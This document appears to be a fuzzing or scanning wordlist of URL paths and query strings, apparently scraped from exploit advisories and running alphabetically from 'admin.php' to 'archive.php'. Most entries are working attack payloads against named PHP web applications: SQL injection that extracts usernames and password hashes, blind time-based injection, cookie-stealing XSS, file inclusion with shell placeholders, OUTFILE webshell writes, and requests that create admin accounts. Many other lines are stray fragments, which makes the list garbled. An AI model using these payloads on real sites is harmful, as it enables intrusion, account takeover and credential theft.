admin.php?id=1
admin.php?id_user=
admin.php?is_admin=1
admin.php?is_admin=1&lang=..
admin.php?&lang=..
admin.php?lang=..
admin.php?last_message=<script>alert(1)<
admin.php?loc=home
admin.php?loggedin=1 
admin.php?&Login=1&section=admins method=post>
admin.php?logout=0" alt="Do you see this?" 
admin.php?mainfile=e&language=<script>alert(document.cookie);<
admin.php" method="get">
admin.php' method='post'>
admin.php" method="POST">
admin.php?mgr=login&js=1">
admin.php?mgroup=settings&mgr=password&objtype=password">
admin.php?mod=%3E%3Cscript%3Ealert(document.cookie)%3C
admin.php?mode=add
admin.php?mode=add" method="post">
admin.php?mode=edit" 
admin.php?mode=users_manager&adsess=SESSION_ID
admin.php?module=database&do=sql_query " method="post" name="main">
admin.php?module=forum&do=admin_new_category " method="post" name="main">
admin.php?module=">&lt;script&gt;alert(document.cookie)&lt;
admin.php?module=news&p=modifier&id=-1  union  select  0,1,database(),3,4,5,6,7  from  membres--
admin.php?module=news&p=modifier&id=-1 union select 0,identifiant,mdp,pseudo,email,description,6,7 from membres--
admin.php?module=NS-AddStory&op=EditCategory&catid='cXIb8O3
admin.php?module=NS-Languages&op=missing&language=">[code]
admin.php?module=NS-Languages&op=missing&language=[sql]
admin.php?module=NS-Languages&op=translation&language=[code]
admin.php?module=pages&mdo=editpage&page=ircrash"
admin.php?module=sendmail&do=send " method="post" name="main">
admin.php?mybloggie_root_path=[evil script]
admin.php\n";
admin.php?name=users&page=1&order=user_id&set_admin=2" 
admin.php?op=AddAuthor&add_aid=attacker&add_name=God&add_pwd=coolpass&add_email=kala@hot.ee&add_radminsuper=1'><
admin.php?op=AddAuthor&add_aid=attacker&add_name=God&add_pwd=coolpass&add_email=kala@hot.ee&add_radminsuper=1[
admin.php?op=AddAuthor&add_aid=waraxe2&add_name=God&add_pwd=coolpass&add_email=foo@bar.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox
admin.php?op=admin&plug=[LFI]%00
admin.php?op=adminSupport&zahl=0&torder=&tcounter=15&ids=99991%27
admin.php?op=ConfigFiles_save&Xtxt=%3c?+phpinfo()+?%3e&Xfiles=footer_after&confirm=1>
admin.php?op=deladmin2&del_aid=dudul
admin.php?op=FaqCatGo
admin.php?op=files&panel=1
admin.php?op=general");
admin.php?op=modifyUser");
admin.php?op=module_status&mid=22&active=1");
admin.php?op=themes");
admin.php?op=yaCustomFields
admin.php?op=yaUsers
admin.php?p=admins-form">
admin.php?page=
admin.php?page=..
admin.php?page=3Din=
admin.php?page=add-new-auction
admin.php?page=add-new-auction" method="POST" novalidate="novalidate">
admin.php?page=akismet
admin.php?page=appearance
admin.php?page=articles&name=users
admin.php?page=articles&name=users&op=newd&dtitle=WHAT_YOU_WANT&ppcontent=WHAT_YOU_WANT&dfolder=0&category=1&autor=admin
admin.php?page=booking
admin.php?page=Categories_Spider_Catalog"; method="post">
admin.php?page=Categories_Spider_Catalog&task=edit_cat&id=2
admin.php?page=Categories_Spider_Catalog&task=edit_cat&id=waraxe
admin.php?page=Categories_Spider_Catalog&task=publish_cat&id=waraxe
admin.php?page=Categories_Spider_Catalog&task=remove_cat&id=waraxe
admin.php?page=Categories_Spider_Catalog&task=save&id=waraxe
admin.php?page=cat_list
admin.php?page=cat_list&delete=1
admin.php?page=cat_list" method="post">
admin.php?page=cat_list&parent_id=-6+union+select+1,concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20),3,4,5,6--
admin.php?page=cat_list&parent_id=-6+union+select+1,password,3,4,5,6+from+piwigo.piwigo_users--
admin.php?page=[code]
admin.php?page=configuration&op=siteConfig&ok=true" method="post" name="main">
admin.php?page=configuration&section=%22%3E%3Cscript%3Eale
admin.php?page=dmsguestbook&advanced=1&folder=language
admin.php?page=events-manager-people
admin.php?page=ExcludePosts
admin.php?page=forums&name=users
admin.php?page=forums&name=users&page=forums&op=newf&fview=Everyone&fpost=Everyone&forumname=WHAT_YOU_WANT&descrip=WHAT_YOU_WANT
admin.php?page=hms-testimonials-addnew">
admin.php?page=hms-testimonials-addnewgroup&noheader=true">
admin.php?page=hms-testimonials-settings">
admin.php?page=hms-testimonials-settings-advanced">
admin.php?page=hms-testimonials-settings-fields">
admin.php?page=hms-testimonials-templates-new">
admin.php?page=languages_new&installstatus=%3Cscript%3Eale
admin.php?page=main&name=users
admin.php?page=picture_modify&cat_id=7&image_id=1'
admin.php?page=plugin-LocalFilesEditor" method="post" name="f1">
admin.php?page=plugins_new&order=date&revision=1364&extension=234
admin.php?page=Products_Spider_Catalog"; method="post">
admin.php?page=Products_Spider_Catalog&task=apply&id=0"; method="post">
admin.php?page=Products_Spider_Catalog&task=delete_rating&del_id=waraxe
admin.php?page=Products_Spider_Catalog&task=delete_ratings"; method="post">
admin.php?page=Products_Spider_Catalog&task=delete_review&del_id=waraxe
admin.php?page=Products_Spider_Catalog&task=delete_reviews"; method="post">
admin.php?page=Products_Spider_Catalog&task=edit_prad&id=5
admin.php?page=Products_Spider_Catalog&task=edit_rating&id=0"; 
admin.php?page=Products_Spider_Catalog&task=edit_reviews&id=0"; 
admin.php?page=Products_Spider_Catalog&task=s_p_apply_rating&id=waraxe
admin.php?page=Products_Spider_Catalog&task=unpublish_prad&id=waraxe
admin.php?page=profile&user_id=1">
admin.php?page=related-ways-to-take-action
admin.php?page=sms
admin.php?page=sms" method="post">
admin.php?page=sp-add" method="post">
admin.php?page=SpiderCalendar&;
admin.php?page=SpiderCalendar&id=2
admin.php?page=SpiderCalendar"; method="post">
admin.php?page=SpiderCalendar&task=add_event
admin.php?page=SpiderCalendar&task=edit_event
admin.php?page=SpiderCalendar&task=published
admin.php?page=SpiderCalendar&task=published_event
admin.php?page=SpiderCalendar&task=show_manage_event&calendar_id=1
admin.php?page=super-captcha
admin.php?page=tags
admin.php?page=tags" method="post">
admin.php?page=testimonials&featQuote&id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)
admin.php?page=theme&theme=%3Cscript%3Ealert%28document.co
admin.php?page=user&id=[ID]" method="post">
admin.php?page=user_list">
admin.php?page=users&name=users
admin.php?page=users&op=edi&uid=2&name=users
admin.php?page=users&subpage=usergroups&subpage=usergroups&action=add&uid=USER_ID" method="post" name="main" >
admin.php?page=users&subpage=users_view&id=null union all select 1,2,concat_ws(0x3a,uname,passwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 from cms_users--
admin.php?page=wlcms-plugin.php&action=save&wlcms_o_developer_name="><script>alert("fun")<
admin.php?page=wpfh-guestbook
admin.php?page=wp-security-scan
admin.php?page=wp-topbar.php&action=topbartext&barid=1"
admin.php?pg=users&adsess=54f824ebcde36ee8844c103d97412123
admin.php?PHPFFL_FILE_ROOT=[ Evil Code ]
admin.php?p=orders-delete&iOrder=2"; 
admin.php?p=otherConfig&amp;sOption=save" method="POST">
admin.php?p=p-delete&iPage=1";><
admin.php?p=settings-config"
admin.php?p=users-form&iUser=">
admin.php?pwfile=[shell]
admin.php?settings=password"><!-- Target Site -->
admin.php?show=..
admin.php?site=..
admin.php?site_url=[[Sh3LL Script]]                   #
admin.php?skin=..
admin.php?skin=[Local File]%00
admin.php?s=[SOMETHING]&act=admin&CODE=01
admin.php?s=[SOMETHING]&act=own
admin.php?style=..
admin.php?submit=Search&ctrl=items&tab=full&blog=1&show_statuses[]=1') )) UNION SELECT version() INTO OUTFILE '
admin.php?templatesDirectory-evill code
admin.php?toitcf_current_id=[ID]&action=delete&page=toitcf" width="1" height="1">
admin.php (To upload Evil )
admin.php   <<< username&password(md5)        
admin.php?viewmemunb&viewmemunb='+[SQL] 
admin.php?viewmem&viewmem='+[SQL] 
admin.php?viewunmem&viewunmem='+[SQL] 
admin.php?zfaction=config
admin.pl
admin.pl?L=home
', 'admin.png', '2010-04-27 11:25:22', 'default', 2, NULL, NULL, NULL, NULL, 'd0970714757783e6cf17b26fb8e2298f', 1, NULL, '0.0.0.0', 'N
adminPolls.php?GlobalSettings[templatesDirectory]=evill
adminPolls.php?GlobalSettings[templatesDirectory]=[evil_script]
adminprint.php?admin_folder=[evil_scripts]
adminprint.php?path=[evil_scripts]
adminprocess.php">
admin.queries.php?_SESSION[user_language]=[etc
admin_quicktags.php?format_guid=tikiwiki&sort_mode=tagpos_asc
admin_ranks.php?phpbb_root_path=[evil_scripts]
 -admin real:passw0rd');
 -admin real:passw0rd\n";
admin_restore.php?action=download
admin_restore.php?action=download&file=..
admin.rssreader.php?mosConfig_live_site=[evilcode]
admins
admin_search?q=123%27%20UNION%20SELECT%201,2,version%28%29,4,5,6,7,8,9,10,11,1 2,13,14,15%20INTO%20OUTFILE%27
/?admin_section=1&NodeID="><script>alert(0)<
admin_sections
adminSensored.php?GlobalSettings[templatesDirectory]=[evil_script]
admin_settings.php" enctype="multipart
admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=include($nst)
admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=passthru($nst)
adminshop
adminside
adminsignin.html?fwd=%22%3E%3Cscript%3Ealert('r0t')%3C
adminSmileys.php?GlobalSettings[templatesDirectory]=[evil_script]
admin_smilies.php?phpbb_root_path=[evil_scripts]
admins.php
admins.php" method="POST">
admins.php?sact=modify&pr=2>
admin_staffs" method="post">
admin_staffs.php" method="post">
adminstart.php
admin_styles.php?mode=addnew&install_to=..
admin_styles.php?mode=export\nUser-Agent: Mozilla
admin_styles.php?mode=export&sid=";
admin_styles.php?phpbb_root_path=[evil_scripts]
/?admin.system.files
admin_table--
admin-tags.php?tagsort="><script>alert(123);<
admin_templates.php?CONFIG[main_path]=[evil_scripts]
admin_theme_remove.php?file=..
admin-thumbcrop.php?a=testalbum&i=waraxe.jpg&subpage='"+autofocus+onFocus="alert(123);
admin-thumbcrop.php?a=testalbum&i=waraxe.jpg&tagsort='"+autofocus+onFocus="alert(123);
admin to login into the application."
admin.treeg.php?mosConfig_live_site=[evilcode]
admin.ucf
admin_ug_auth.php?phpbb_root_path=[evil_scripts]
adminui
adminupdate.php?act=add&filter_login=&goodmsg=Account+Added" method="post">
admin-upload.php?page=upload&tab=albums
admin_user_ban.php?phpbb_root_path=[evil_scripts]
adminusers
admin_users
admin_users_create.php" method="get">
admin_users_delete.php?id=2" alt="Do you see this?" 
adminuserslist.php
admin-users.php?action=saveoptions" method="post">
admin_users.php] akan menjawab Not Found dan Keluar
admin-users.php?page=users&mismatch=format&error=%253cscript%253ealert(123);%253c
admin_users.php?phpbb_root_path=[evil_scripts]
admin_users_update.php" method="get">
AdminUsers?user=TestUser&action=delete"}}
admin V 1.1
admin V1.2
admin.wmtportfolio.php?mosConfig_absolute_path=[evilcode]
admin_words.php?phpbb_root_path=[evil_scripts]
admin you obtain: 'Please Login' and the cookie
admisource.gouv.fr
adm_main.php
adm_noticias.php
adm_noticias.php?deleta=0%20or%201=1--+
adm_noticias.php?deleta=ID&unlink=FILE
ADM_Pagina.php?Tipo=[EVIL CODE]
adm-photo.php?ppaction=manipulate&pid=[IMAGE ID]&dowhat=rebuildthumb&dowhat=rotateccw 
adm_program
admun
admuser.php?Modus=Find
adnforum
a_docentes
a>";document.write(a);<
adodb
adodb-error.inc.php?ADODB_LANG=[EV!L]
adodb-errorpear.inc.php?ourlinux_root_path=[SHELL]
adodb_lite
adodb-pear.inc.php?ourlinux_root_path=[SHELL]
adodb-perf.inc.php?output=id
adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}
adonet
/?a=downloads&cid='
adp
adp      #
adpeeps
ad.php?Back=%27%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C
ad.php?GLOBALS[g_campsiteDir]=[LFI]
ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+login+from+br_admins--
ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+pass+from+br_admins--
ad_popup.php?GLOBALS[g_campsiteDir]=[SHELL]
".$adres;
adresse.php?Modus=Detail&ID=2+AND+0+UNION+ALL+SELECT+1,version(),database()%23&Kontext=ereignis
adrotate
adrotate-out.php?track=1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)%23
adrotate-out.php?track=$encoded
adrotate-out.php?track=MScgQU5EIDE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpKSksMCkj
ads
Ads
ads-a-affiliates
ads.asp
ads.dat'. Simple.
adserver
ads.php?package=<SQL C0de>                      #
ad_trader
adubus.free.fr
adullact.net
adult
adultbannerexchange.php
adultdir
adult-portal-escort-listing-script.html
adultscript.net
adultweb
adv
advance-biz
advanced
advanced1.php?pluginpath[0]=[evil_script]
advanced-forum-signatures
advanced-image-hosting-v2.2
Advanced-Image-Hosting-V2.2
advanced-photo-gallery
advanced.php?page=..
advanced_scripts
advanced_search')) {
AdvancedSearchHtmlSearchRenderer.class.php?gfwww=[Shell]
advanced_search.php?in=..
advanced_search.php?in=[LFI]
advanced_search_results.php?gender=Female&fage=18+union+select+0,1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77+from+users--&tage=20&country%5B%5D=India&community=&photograph=Yes&x=58&y=15
advanced.tpl.php?uri=..
adv_cat.php?cat_id=4"><script>alert()<
advertise_detail.php?id=77[SQL-INJECTION!]
advertiser
advertiser-delete.php?clientid=2> Check This <
advertiser-delete.php?clientid=[valid-id]
advertiser.php?action=password_reminded
advertiser.php?action=user_login
advertiser.php?adv_logged=1&username=1&password=' 
advertiser.php?adv_logged=1&username=1&password=qwe' or 1=1 UNION select uid,name,password,surname,job,email from dcp5_members into outfile'
advertiser.php?adv_logged=1&username=1&password=qwe' or 1=1 UNION select uid,name,password,surname,job,email from dcp5_members into outfile'c:
advertiser_statistic.php?action=statistic_main&ad_number=[SQL]
advertiser-user-unlink.php?userid=[valid-id]&clientid[valid-id]
advertizer
adverts.php?category_id=5 UNION ALL SELECT 1,2,concat(login,0x3a,passwd),4,5,6,7,8,9,10 FROM members
advisor5
advisor5.html
advisories
Advisories
advisories-026.html"
Advisories.htm
advisories.html
advisories.php?id=10-040
advisories.php?id=2
advisories.php?id=8
advisories.php?id=CORELAN-10-043
advisors
advisory
Advisory
advisory0040
advisory_2011-10-25.php
advsearch?q=hilfe&catids=5\%27
AEDating_SQL.rar.html
a_editpage.php?filename=[arbitrary_file]
aff_banners.php?action=edit_banner&banner_id="><script>alert(0)<
aff_banners.php?action=edit_link&banner_id="><script>alert(0)<
aff_clicks.php?year_month='SQL'&action=aff_sales
affectation.class.php?path_om[Shell]
affectationportable.class.phpp?path_om[Shell]
affectationvehicule.class.php?path_om[Shell]
affichage.php?ID=-9'UNION%20SELECT%200,0,0,US_pseudo,US_pwd%20from%20pphp_user
afficher.php?id_sal=-9'%20UNION%20SELECT%20US_pseudo,US_pwd,0%20from%20pphp_user
affiliate
affiliate.htm
affiliates
Affiliate-Script.dat
affiliateshoppingcart.php
affmarket
aff.php?action=payout_info (other payment plugins might be vulnerable too)
aff.php?action=<script>alert(0)<
aff_signup.php (first- and last-name)
a_file%00
afilesend
aflog
aflog.org
agares_phpautovideo_v2.21.html
agasti
agb.php?lang=[LFI]
agencies.html
agency5
agenda
[agendapath]
agenda_titre.php?moisEnCours=Sql Injection Code
a_general
agent
agentadmin.php
agent.class.php?path_om[Shell]
agentdisplay.php?view=1[SQL-INJECTION!]
agenteditor.php?action=addagent" method="post">
agenteditor.php?adminmodify=2" method="post">
agentes
agentprofile.php?userid=16+union+select[SQL-INJECTION!]
agentprofile.php?userid=16+union+select[SQL-INJECTION]
agent-zone-real-estate-script.html
agermenu
agermenu-0.01.tgz
age-verification
age-verification.php
age-verification.php?redirect_to=http%3A%2F%2Fwww.evil.com
aggregator.php?zf_path=[Shell]
a.gif');alert(document.cookie);a=escape=('a[
agora-project
agora_users
aguestbook
aguestbook.sourceforge.net
a-h-crew.net    
\<a href\=\"http\:\
aides
aidicms
aid,pwd
aigaion
aihs-feature.php
aihspro
aimstats
aimstats.php                                                       +
a_index.php?opcao=TopicosCadastro1&CodigoDisciplina=null+union+all+select+concat_ws(0x3a,senha_usuario,email_usuario)+from+usuario+where+id_usuario=1--&numtopico=1
ains_main.php?ains_path=[evil_code]
aiocp
AIOCP%201.4.001
a>.ir<
airvision
airVision-v1.1.3-installer.exe
AJA
ajarticlev3
ajauction_platinum
ajauction_platinum2
ajax
Ajax
ajax_browse
ajax-category-dropdown
ajax_cat_ins.php">
ajax-chat
ajax_clickcounter.php
ajax_comments.php?p=0';
ajax_download.php?path=..
ajaxfb
ajaxfilemanager
ajaxfilemanager.php
ajaxfilemanager.php?path=..
ajaxgallery
ajaxim
ajax_listado.php?urlModulo=[[Sh3LL Script]]
ajaxp_backend.php?page=-1+union+select+1,concat_ws(char(58),username,password),3,4,5,6,7+from+dbPfixajaxp_users--
ajaxp_backend.php?page=-1+union+select+1,concat_ws(char(58),username,password),3,4,5,6,7+from+PREFIX_users--
ajaxp_backend.php?page=[BLIND]
ajax.php
ajax.php";
ajax.php?ajax=info&id=wiki&acl_w=@ALL&cmd[del]=1&acl=(ACL)
ajax.php?ajax=info&id=wiki&acl_w=@ALL&cmd[save]=1&acl=(ACL) 
ajax.php?ajax=info&id=wiki&acl_w=@ALL&cmd[update]=1&acl=(ACL)
ajax.php?ajax=tree&ns=..
ajax.php?api=tickets&f=searchbyemail&input=nah%27%20%20union%20sel
ajax.php?do=inforum&listforumid=100%29%20UNION%20SELECT%201,concat_ws%280x7c,user%28%29,database%28%29,version%28%29%29,3,4,5,6,7,8,9,10--%20-&result=20
ajax.php?function=massemail&subject=owned&msg=pwn" alt="Do you see this?" 
ajax.php][GET][id=-1][CURRENT_USER()
ajax.php][GET][id=-1][MID((VERSION()),1,6)
ajax.php][GET][id=-1][SELECT
ajax.php?language=[LFI]
ajax.php" method="post">
ajax.php?m=tracking&id=123&ln=doe
ajax.php?op=archivedeleteshout&shout=war'axe
ajax.php?op=check_username&username=war'axe
ajax.php?op=get_imdb&torrent=war'axe
ajax.php?op=member_search&search=war'axe
ajax.php?op=member_search&search=z&browsemenu=<script>alert(123);<
ajax.php?op=member_search&search=z&pagemenu=<script>alert(123);<
ajax.php?op=private__chat&to=-1'UNION+SELECT+1,2,@@version,4,5,6,7,8,9,10,11%23    
ajax.php?op=take_delete_archive_shout&shout=war'axe
ajax.php?op=take_delete_shout&shout=war'axe
ajax.php?op=take_edit_archive_shout&shout=war'axe
ajax.php?op=take_edit_shout&shout=war'axe
ajax.php?op=view_coments_page&password="><
ajax.php?op=view_coments_page&torrent="><
ajax.php?op=view_details_page&torrent=><script>alert(123);<
ajax.php?op=view_details_page&torrent=war'axe
ajax.php?op=view_details&torrent=><script>alert(123);<
ajax.php?op=view_details&torrent=war'axe
ajax.php?op=view_files_page&torrent=1&pass=war%2527axe
ajax.php?op=view_nfo_page&torrent=..
ajax.php?op=view_peers_page&torrent=1&pass=war'axe
ajax.php?op=view_rate_page&torrentrating=<script>alert(123);<
ajax.php?op=view_rate_page&torrent=war'axe
ajax.php?op=view_shout&shotuser='UNION+SELECT+1,2,@@version,4,0,6,7,8,9,10,11%23
ajax.php?page=
ajax.php?page=..
ajax.php?page=operation
ajax.php?post=true&act=reloadCombo&table=wp_eva__veille_groupe_question&nomRacine=-1" UNION ALL SELECT 1,@@version,3,4,5,6,7--%20
ajaxplorer-core-5-0-3
ajaxplorer.info
ajaxplorer.info)
AjaxPortal
[ajaxportal-3.0_path]
ajaxprofile.php?id=1[SQL-injection]
ajax_response.php" method="post">
ajax_response.php?op=check_file&name=...
ajax_save_name.php
ajax_sorter.php
ajaxupload
ajaxupload.php" method="post" enctype="multipart
ajclassifiedsme
ajclassifieds.net
ajcuser.php?GLOBALS[mosConfig_absolute_path]=[INDONESIANCODER-Ev1L]
ajfork
ajhome.php
ajhyip
ajlist-craigs
ajlist-elite
ajmatrixdna
ajoutaut.php";
akarru.gui
akcms4.2.4
aksam.php"><
aktiviteter
aktivitet.php
al3jeb
alameda
alarms_events.php
albayx.php
AlberT-EasySite
album
Album
album.asp?action=login                                                      #
album.asp?action=uploadmedia&cat=Real Category Name!                    #
album_cat.php?cat_id=5&amp%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C
album_comment.php?pic_id=224&amp%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C
albumdetail.php?albumid=-23+union+select+1,2,3,4,5,6,7,8,9,10,11,12,
albumdetail.php?albumid=-31+union
album_gallery
album.html?cid=[LFI]%00
/?albumID=-1+UNION+ALL+SELECT+database(),user()%23
/?albumID=-1+UNION+ALL+SELECT+'<HTML><title>SHUTTER v0.1.1--SHELL BY --Y3NH4CK3R--><
album.php 
album.php?apa_album_ID=1 UNION SELECT concat_ws(0x3a,version(),database(),user())
album.php?apa_album_ID=2 1
album.php?apa_album_ID=2 2
album.php?apa_album_ID=>'><script>alert(1337)<
album.php?id=-1+union+select+0,password,username,3,4,5+from+users
album.php?UID=-58+UNION+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
albums
albumsedit.php?id=23[SQL-INJECTION]
albums.php?id=16+union+select+1,concat(username,0x3a,password),3,4,5+from+admin--
albums.php?section=cats&action=show&CatId=-1+union+select+1,concat_ws(0x3a3a,UserName,UserPassword,UserEmail),3,4,5,6,7,8,9+from+tblUsers
albumV1.6.tgz
albythebest.altervista.org
AL-Caricatier
alertConfigField.php?urlConfig=..
alertConfigField.php?urlConfig=[FI]
alertConfigField.php?urlConfig=php:
alert_members.php?action=login&link_idd=%27%20onmouseover%3dprompt%28900153%29%20bad%3d%27
">alert('qabandi')
alerts
alexa
Alexa,509+and+1=0--+ 
Alexa,509+and+1=1--+ 
aliases%00 
alias.php?lib=[evilcode]
alibaba-clone
alibabacom-clone-new.html
alicecms.sourceforge.net
Aligro
alikon
al_initialize.php?alpath=ftp:
alinti.php?mesajid=-6666+UNION+SELECT+sifre+FROM+uyeler+WHERE+id=1
alinti.php?mesajid=[SQL]
alisveris
alitalk
aljazeera
alkalinephp
alko.web.id
all
aLl
ALL
ALL%20SELECT
allauctions.php?aid=2+and+1=0 (false )
allauctions.php?aid=2+and+1=1 (true)
allauctions.php?aid=2+and+(SELECT+1+from+admin+limit+0,1)=1
allauctions.php?aid=2+and+(SELECT+substring(concat(1,pass),1,1)+from+admin+limit 0,1)=1
allauctions.php?aid=2 and (SELECT+substring(concat(1,username),1,1) from admin limit 0,1)=1
all_blogs.php?user=SqlInjection Code
allbooks.php?home=[SHELL]
[ all files. ]
  (All Files).php?idfestival= (SQL)
allincludefortick.php?PATH_TO_CODE=[SHELL]
all?items_per_page=25,0--
all_meta.php?pst_title=1') UNION ALL SELECT CONCAT_WS(CHAR(44),version(),current_user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--%20&page=100&rows=1
allmyguest
AllMyGuests
[AllMyGuests_Path]
AllMyLinks
allocations
allopass-error.php?mosConfig_live_site=[evilcode]
allopass.php?mosConfig_live_site=[evilcode]
allow-php-in-posts-and-pages
all.php?tag=<script>alert(document.cookie)<
all_projects.php
allpubs.php?idAuthor=-19+union+select+1,version()--
, All Rights Reserved"
~~All Version ~~
all-video-gallery
allwebmenus-wordpress-menu-plugin
alnjm33_aasaa.php.rar
a_login.php?message=<b>security-testing-roott3r<
alp
alp_0-98-3_15oct2006
alpha-cms
alpha.php?Absolute_Path=[LFI]
alpin-cms
alreadyregistered.tpl.php?CFG[skin]=..
alsoft_exploit_pack;  |
alternate_profiles
alter.php
alwasel
alwasel.html
am
am2
am4ss
am4ss.org
amaken.php"> <
amazon
amazon2
amazon_directory.html
Amazonia_Mod.htm                                              #
amazon_shop.php                  
amber
[amber_path]
Amber_Script_1.0.rar (Nulled)
amdin
amember
amember intext:© CGI-Central.NET, 2002-2006
amethyst )
amevents
am-file.php.mp3
amministrazione.php?finame=1
amoeba2
amportal
ananta
AnantaPatch
ananta.png
Anantasoft_Gazelle_CMS
AneCMS 
AneGroup
angemeldet.php?lang=[LFI]
angora_1_5
Angstrom-distribution
An_image_gallery
anketa
anmelden.php?lang=[LFI]
annonces
annonces-p-f.php?op=ImprAnn&lid=-1+union+select+1,pass,uid,uname,5,6,7,8,9,10,11,12,13+from+xoops_users+limit+1,1
annonces-p-f.php?op=[SQL]
announce
announcements
announcements.php?id=1' and 1=0 union all select 1,2,concat(email,0x3d,password),username,5 from tbladmins--                                        
announcements.php?id=1%bf%27%20and%201=2%20%20UNION%20select%201,2,user(),4,5,6,7,8,9,10,11%20
announceprint.php?announcenr=1+AND+1=2+UNION+ALL+SELECT+1,2,3,4,GROUP_CONCAT(username,0x3a,password),6,7,8,9,10,11,12,13,14,15+FROM+simpnews_users--
announceprint.php?announcenr=[sql]
announcing-civicrm-422
announcing-front-end-upload-wordpress-plugin
annuaire.class.php?path_om=[Shell]
annuaire.php?annuaire=68&sort_field=&cat_id=4+union+select+concat_ws(0x3a3a,user_id,user_login,user_pass,user_fname,user_lname,user_access,user_email)+from+an_users
anonproxyserver
anon_proxy_server_0.100
anon-www.cgi
anonymous:anon@1.12.123.123
anonymouse.ws
ansFAQ.asp?id=1&topic=<
ansFAQ.asp?id=-2 union select email,password from [user] where email like '%25admin%25'
answer.php?id=[SQL] 
answer.php?question_id=41 AND 1=2 UNION SELECT concat(administrator_login,0x3a,administrator_password),2,3,4,5,6,7,8,9 FROM administrator
answers.php?action=answers&instid=[SQL]
answers.php?quiz=-1&order_number=-1+UNION+ALL+SELECT+concat(user(),0x3A3A3A,version())
answers.php?quiz=-1&order_number=-1+UNION+ALL+SELECT+concat(username,0x3A3A3A,password_hash)+FROM+admins
answers.php?quiz=-1+UNION+ALL+SELECT+concat(user(),0x3A3A3A,version())
answers.php?quiz=-1+UNION+ALL+SELECT+concat(username,0x3A3A3A,password_hash)+FROM+admins
anthologia-last.tgz
anthology.htm
antichat.ru
anticsurf
antihacker.php
antijasakom.net
antisecradio.fm (choose your weapon)
antispam.php?secure=login";
anunturi
any
anycategorynamehere)
any_file%00
anyfile.ext
[any_file]?GLOBALS[AA_INC_PATH]=[evil_scripts]
any_host
[anyInventory_path]
[any module]?id=1 and 1=1
[any module]?id=1 and 1=2
[any module]?id=1 and exists (select * from [TABLE])
[any module]?id=1 and exists (select * from users)
[any module]?id=1 AND (SELECT Count([COLUMN]) FROM [TABLE]) >= 0
[any module]?id=1 AND (SELECT Count(*) FROM [TABLE]) >= 0
[any module]?id=1 AND (SELECT Count(*) FROM [TABLE]) = [NUMBER]
[any module]?id=1 AND (SELECT Count(*) FROM users) >= 0
[any module]?id=1 AND (SELECT Count(*) FROM users) = 6
[any module]?id=1 AND (SELECT Count(U_PASSWORD) FROM users) >= 0
any_name.php?cmd=uname%20-a 
[any_section]
[ANY STYLE]
anything
aoblogger
aol.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C
a"onerror="javascript:alert(document.cookie)[
apa
apache
apache2
apache2.conf
apache2-default
apages.php?sgroup>=-
apartment
apartment.asp
apartments
apb
apbn
apboard
apc-aa
[APC_path]
apertoblog
aPFsz.png
a.php
a.php?a=..
aphpkb
[aphpkb_path]
api
api\
api_jsonrpc.php
apodcasting
apoll
apoll_path cmd
) a popular and acclaimed free, open source Test management tool written in PHP.
 - A powerful free blog
app
[app]
app             ]
app_and_readme
/?app=forums&module=moderate&section=moderate&f=1&do=prune_move&df=3&pergo=50&dateline=0&state=open&ignore_pin=1&max=0&starter=1%20AND%20starter_id=1%20OR%20substr(version(),1,1)=5%20AND%20sleep(15)%20--%20skip%20&auth_key=c4276b77602767228faa9760eb4a5abd
appimage
app.inc.php?go_info[server][classes_root]=[cmd_url]
applanix
application
application.php
applications
applications_manager )
applications.php?theme=..
application_top.php?current_page=[EV!L]
application_top.php?language=[EV!L]
appmanager.127.0.0.1:1338
appmanager.127.0.0.1:1339
app_new.php?t=200408240<script>alert(document.cookie)<
appointinator.chemeia.info
approve_entry.php?gfplugins=[Shell]
approve_.php?gfplugins=[Shell]
approve.php?u=1&a=$power");
apps
Apps
apps.asp?app_id=5&
apps.php?app=[-Sh3ll-]
apps.weblite.ca">
Apr
apr2010
aps_browse_sources.php?mode=browse_classes&source_class=1+UNION SELECT 1,group_concat(user_name,0x3a,user_pass,0x2e,user_email),3,4+from+login_table--
apscatalog
APSN
aptgp
Aqar
aquartier.class.php?path_om=[Shell]
aqz25984.jpg
ar
ara
arabCart
arabportal_22
arab-portal.net
Arab_Portal_v.2.0_beta_2
aradown.info
aramar.jp
arash
aratix
arbre.php?0=search&last=1<body+onload=alert(document.cookie)>
arcade
arcadem-rfi-sql-injection-flaws.html
archbatch.php?lng=..
archery-scores
archieves
archin-premium-wordpress-business-theme
architecte.class.php?path_om=[Shell]
archiv2.php
archive
Archive
/?archive&ctg=[SQL] 
archive.php?adminfolder=[shell]"
archive.php?ArchiveID=
Archive.php?bkpwp_plugin_path=Shl3?
archive.php?blogid=[sql]
archive.php?deleteTorrent=..
archive.php? entry=1
archive.php?id= 
